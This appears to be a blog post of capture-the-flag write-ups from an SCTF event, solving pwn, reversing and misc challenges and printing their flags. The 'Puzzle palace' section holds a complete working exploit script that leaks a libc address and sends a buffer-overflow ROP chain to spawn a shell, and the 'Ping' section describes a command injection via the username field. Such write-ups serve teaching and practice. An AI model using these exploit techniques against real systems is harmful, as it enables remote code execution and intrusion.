Puzzle palace - Pwn (100 + 0)
Adventure time! Find the magic bytes, kill the wizard, get all the flags!
Solves: 42
Service: nc pwn.ctf.rocks 6666
Download: http://dl.ctf.rocks/puzzle_palace.tar.gz
Author: likvidera
In the tar file we can find README and some libc version. README reads as follows:
Yep you only get the libc, connect to the service and go for an adventure to get the rest.After connecting to the service, we've got:
and
We can notice that the magic bytes start with 7F454C46 => which is "\x7FELF", magic number for ELF executable file format. Going down(pressing 2) is showing us the next parts of the file. We need a script to dump it all.
from telnetlib import Telnet import binascii output = b"" with Telnet("pwn.ctf.rocks", 6666) as tn: tn.read_until(b"shame\n") tn.write(b"1\n") last_data = 0 while True: out = tn.read_until(b"Down\n") print (len(out)) tn.write(b"2\n") if len(out)!=224 and len(out)!=253: #last_data == data: print (out) break data = out.split(b"[")[1].split(b"]")[0] output+=data print (data) last_data = data print (output) bin_out = binascii.unhexlify(output) open("out_bin", "wb").write(bin_out)
I've used telnetlib, it worked like a charm, after analysing the binary, it turns out that it is the same binary that is currently running on the server, we can investigate what exactly is going on. Interesting parts are:
Putting in 'Z' instead of number, can leak us system function address, this will be useful due to fact that ASLR on the remote machine is enabled.
We also found the correct bytes to trigger buffer overflow at the bottom of the screen, buf is small buffer, 20 bytes in size.
Given all that, all we needed to do was a ROPchain that gives us shell. We used system address to get libc base address, and from that we can calculate all gadgets addresses. I used only one, "pop rdi", and one address for "sh\0" string.
So my notes are:
system offset: 0x45390
pop rdi offset: 0x21102
"sh" offset: 0x11e70Final exploit used this chain:
&pop rdi;
&"sh"
&system
Here is the final exploit:
from __future__ import print_function from telnetlib import Telnet from pwn import * import binascii output = b"" sys_off = 0x45390 pop_rdi_off = 0x21102 sh_off = 0x11e70 tn = Telnet("pwn.ctf.rocks", 6666) #tn = Telnet("localhost", 4444) tn.read_until(b"shame\n", 10) tn.write(b"Z\n") addr = tn.read_until(b"shame\n", 10) addr = addr.split(b"\n")[1][:-1].split(b":")[1] addr_int = int(addr, 16) system = addr_int base_libc = system - sys_off pop_rdi = base_libc + pop_rdi_off sh = base_libc + sh_off print(hex(base_libc)) print(hex(pop_rdi)) print(hex(sh)) print(hex(system)) payload = b"A"*24 +b"BBBBBBBB"+b"CCCCCCCC"+ p64(pop_rdi) + p64(sh) + p64(system) + b"\n" tn.write(b"2\n") tn.read_until(b"bytes: ", 10) tn.write(b"1337p0werOverWhelMing1337\n") tn.read_until(b"now!: ", 10) print(payload) tn.write(payload) tn.interact() tn.close()We got the shell and the flag, yeah!
Empty - Misc (100 + 0)
Some suspicious character left this laying around on our system , seems to be empty.
Solves: 121
Download: http://dl.ctf.rocks/empty.7z
Author: d3vnu11
We get pdf file that looks blank. I used pdf-parser, it can be found in the kali linux, or downloaded from here: https://blog.didierstevens.com/programs/pdf-tools/
It found some objects, where one of them looked like this:
I must admit that I have no idea how pdf inner workings actually work, but it looked to me like ascii range, so I just converted it in python and it turned out to be the flag...
Python 2.7.12 (default, Nov 19 2016, 06:48:10) [GCC 5.4.0 20160609] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> a = "83 67 84 70 123 115 116 114 52 110 103 51 95 111 98 106 51 99 116 95 99 104 114 95 49 110 95 112 108 52 49 110 95 115 49 116 51 125" >>> "".join([chr(int(c)) for c in a.split()]) 'SCTF{str4ng3_obj3ct_chr_1n_pl41n_s1t3}'
Ping - Pwn (50 + 0)
A simple ping-service for sysadmins, what could go wrong!?
Solves: 91
Service: nc pwn2.ctf.rocks 3030
Download: http://dl.ctf.rocks/ping.tar.gz
Author: likvidera
We are provided with a binary file.
Service is behaving as shown on the image:
As you can see, the first thing I tried was simple command injection, it turns out that the service does some sort of validation, after looking at it in disassembler, we know that the only characters that we can use are numbers, dots and a new line. Further investigation shows that the buffer that is used for login and getting IP for pinging when 2) Ping is chosen is the same.
So we could put our command incjection in the username field, there is no validation.
There is one problem tho, we can't ping until we Set IP, setting IP clears the buffer first, even if we don't provide any input to it. Also we can't just ping because we have check in code for not null value of allocated buffer for IP address.
It can be hard to explain, I recommend analysing the binary yourself, after all the solution was to initialize the pointer, then exit, set new username as a command injection and ping which would trigger our injection. Like so:
Signal - Rev (100 + 0)
Hey... My boss told me to reverse this program but I dont understand anything!!! wtf is PIE? Sooo annoying~
Solves: 40
Download: http://dl.ctf.rocks/signal.tar.gz
Author: deep
We're given a binary. After running it we can see that it takes our input and depending on that prints if the flag is correct. Few minutes of analysis yields that there is some code that is unpacked by the binary and then run.
From another part of the binary it was clear that we have to get into the first branch of the if statement. I used gdb to let the binary unpack itself.
After stepping a bit through the code in debugger, we can see that this code is just doing simple xoring of our input with 0xde and then comparing it to some memory contents. Let's see with what exactly.
So I just xored those bytes with 0xde and got the flag: SCTF{early_early_sunday_morning?}
Qr code madness - Misc (200 + 0)
Random pictures, this do not make sense
Solves: 55
Download: http://dl.ctf.rocks/qrcodemadness.7z
Author: d3vnu11
In the zip file there are 114 images with qr codes on them.
I quickly checked few of them at random with zbarimg utility, which can transform QR-images into text. All of those images encode one character only. The only thing we needed to figure out was the order in which we have to read them, I tried alphabetically and by date, the second way was the correct one.
ls -tr | xargs zbarimgAfter cleaning up output a bit, we get
aC+40zqGmlLSdIJ1hY3EKoTwsrxWpkiAybPXU9Dj5veRVBHfFg6utM7QncU0NURntUaDNzM19kNG1uX1FSX2MwZDNfazMzcF9wMHAxbmdfdXB9Cg==
which looks like base64 but doesn't want to work. After a while I tried to cut some of the chars from the beginning, and with some luck, I've got the flag.
I heart cats - Misc (50 + 0)
We got this cute cat page. There is something odd in it. But I can't quite say what.
Solves: 52
Download: http://dl.ctf.rocks/badhtml.tar.gz
Author: SecureLink / klondike
We are given index.html file with a lot of cat pictures, we can see that the index.html is formatted in a weird way, this is a hint. Highlighting tabs and spaces shows us a bit more.
I assumed that 8 spaces are 0s and tabs are 1s, this immidiately gave the flag.
asd = open("index.html", "r").read() out = "" i=0 while i < len(asd): if asd[i:i+8] == " "*8: out += "0" i+=8 continue elif asd[i] == "\t": out += "1" i+=1 answer = "" for i in range(0, len(out), 8): answer += chr(int(out[i:i+8], 2)) print answer
Flag: SCTF{Wh1735p4c35_4r3_84d_4u!}
0 comments:
Post a Comment